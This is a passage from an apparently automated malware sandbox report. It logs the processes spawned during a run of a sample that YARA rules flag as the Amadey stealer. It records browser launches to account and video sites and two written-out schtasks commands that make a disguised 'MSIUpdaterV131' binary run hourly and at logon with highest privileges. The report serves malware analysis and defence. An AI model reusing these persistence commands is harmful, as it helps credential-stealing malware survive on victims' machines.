                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2060,i,8917249356731724764,4060394153306559308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                  Start time:12:29:20
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1912 --field-trial-handle=1968,i,14158324147676388731,1062553766962202569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                  Start time:12:29:21
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,9119518786017765982,11408166405058387419,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:12:29:21
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                  Start time:12:29:22
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1976,i,16814294900655359073,9593979145222890954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                  Start time:12:29:22
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                  Start time:12:29:22
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                  Start time:12:29:23
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:12:29:23
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2160,i,16389860597425483203,2440417180069271130,262144 /prefetch:3
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2044,i,14961278424366734041,2160420270144941880,262144 /prefetch:3
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                  Start time:12:29:25
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                  Start time:12:29:25
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=2488,i,12328680280612180646,18333747278986842312,262144 /prefetch:3
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                  Start time:12:29:25
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                  Start time:12:29:27
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                  Start time:12:29:27
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video --attempting-deelevation
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                  Start time:12:29:27
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com --attempting-deelevation
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                  Start time:12:29:27
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                  Start time:12:29:28
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                  Imagebase:0xf00000
                                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                  Start time:12:29:28
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                  Start time:12:29:31
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                  Imagebase:0xf00000
                                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                  Start time:12:29:31
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                  Start time:12:29:32
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dec1c63-b17a-4876-842e-08a38d7ca489} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 15443b69710 socket
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                  Start time:12:29:32
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe"
                                                                                                                                                                                  Imagebase:0xe80000
                                                                                                                                                                                  File size:1'882'112 bytes
                                                                                                                                                                                  MD5 hash:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002F.00000003.2504348053.0000000004E70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002F.00000002.2988504929.0000000000E81000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                  Start time:12:29:34
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                                                                                                                                                                                  Imagebase:0xef0000
                                                                                                                                                                                  File size:1'882'112 bytes
                                                                                                                                                                                  MD5 hash:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000030.00000003.2671707007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000030.00000002.2726513631.0000000000EF1000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                  Start time:12:29:35
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                                                                                                                                                                                  Imagebase:0xef0000
                                                                                                                                                                                  File size:1'882'112 bytes
                                                                                                                                                                                  MD5 hash:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000033.00000003.2673856805.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000033.00000002.2815292742.0000000000EF1000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                  Start time:12:29:35
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3352 -childID 1 -isForBrowser -prefsHandle 3476 -prefMapHandle 3456 -prefsLen 21837 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03d6e9a6-1e50-44a7-bf2d-b228302d3bed} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154542c5bd0 tab
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                  Start time:12:29:35
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 22027 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15219fb-e510-488d-91c4-9069f57fa56f} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 1544ff41d90 tab
                                                                                                                                                                                  Imagebase:0x7ff728280000
